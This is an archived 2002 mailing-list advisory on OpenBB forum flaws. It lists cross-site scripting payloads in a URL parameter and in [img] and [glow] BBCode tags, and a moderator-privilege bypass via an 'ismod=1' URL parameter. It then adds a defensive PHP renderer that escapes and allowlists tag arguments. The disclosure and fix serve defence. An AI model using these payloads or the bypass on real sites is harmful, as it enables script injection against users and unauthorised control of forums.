Product : OpenBB
http://www.prolixmedia.com

Versions : 1.0.0 RC3 (and earlier?)

Problems :
- XSS
- Access to moderators' options

Exploits :
- /myhome.php?action=messages&box=<*form%20name=a><input%20name=i%20value=XSS></*form><*script>alert (document.a.i.value)</*script>
- [img]http://" onerror="[SCRIPT]"[/img]
- [glow tcolor=')" onmouseover="[SCRIPT]" nothing="('hop, fcolor=red, size=100]HUHUHU[/glow]
- moderator.php?action=lock&TID=FORUMID&ismod=1
  moderator.php?action=lock&TID=FORUMID&ismod=1&status=1
- etc ...

More details in French :
http://www.ifrance.com/kitetoua/tuto/OpenBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FOpenBB.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%2Flanguage_tools

frog-m@n
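
The [img] and [glow] items above both work by closing the quoted HTML attribute that the tag argument is copied into. The PHP below is an added example, not OpenBB code and not part of the original post: a hypothetical BBCode renderer (the function names, the default glow values and the text-shadow markup are assumptions) that validates each tag argument against an allowlist and escapes everything else, so both quoted inputs come out as inert text.

```php
<?php
// Hypothetical renderer for illustration only; none of these names come from OpenBB.
// Escape for an HTML text node or attribute value; ENT_QUOTES covers both " and '.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// [img]: accept only absolute http(s) URLs free of quotes, angle brackets and whitespace.
function render_img(string $url): string {
    if (!preg_match('~^https?://[^\s"\'<>]+$~i', $url)) {
        return esc("[img]{$url}[/img]");            // rejected tag is shown as plain text
    }
    return '<img src="' . esc($url) . '" alt="">';
}

// [glow]: colours must match an allowlist pattern, size is clamped to an integer range.
function render_glow(string $args, string $text): string {
    $opt = ['tcolor' => 'black', 'fcolor' => 'yellow', 'size' => 2];   // assumed defaults
    foreach (explode(',', $args) as $pair) {
        [$k, $v] = array_map('trim', explode('=', $pair, 2) + [1 => '']);
        if (($k === 'tcolor' || $k === 'fcolor') && preg_match('/^(#[0-9a-f]{3,6}|[a-z]{1,20})$/i', $v)) {
            $opt[$k] = $v;
        } elseif ($k === 'size' && ctype_digit($v)) {
            $opt['size'] = max(1, min(10, (int)$v));
        }
    }
    return sprintf('<span style="color:%s;text-shadow:0 0 %dpx %s">%s</span>',
        $opt['tcolor'], $opt['size'], $opt['fcolor'], esc($text));
}

// Split on the two tags first so every other byte of the post is escaped exactly once.
function render_bbcode(string $post): string {
    $re = '~(\[img\].*?\[/img\]|\[glow\s[^\]]*\].*?\[/glow\])~is';
    $out = '';
    foreach (preg_split($re, $post, -1, PREG_SPLIT_DELIM_CAPTURE) as $i => $part) {
        if ($i % 2 === 0) {
            $out .= esc($part);                      // text between tags
        } elseif (preg_match('~^\[img\](.*)\[/img\]$~is', $part, $m)) {
            $out .= render_img($m[1]);
        } elseif (preg_match('~^\[glow\s([^\]]*)\](.*)\[/glow\]$~is', $part, $m)) {
            $out .= render_glow($m[1], $m[2]);
        }
    }
    return $out;
}

// Sample posts: the two placeholder strings quoted in the advisory, plus a benign tag.
foreach (['[img]http://" onerror="[SCRIPT]"[/img]',
          "[glow tcolor=')\" onmouseover=\"[SCRIPT]\" nothing=\"('hop, fcolor=red, size=100]HUHUHU[/glow]",
          '[glow tcolor=blue, fcolor=red, size=3]hello[/glow]'] as $s) {
    echo render_bbcode($s), "\n";
}
```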
This archive was generated by hypermail 2b30 : Thu May 23 2002 - 21:33:47 PDT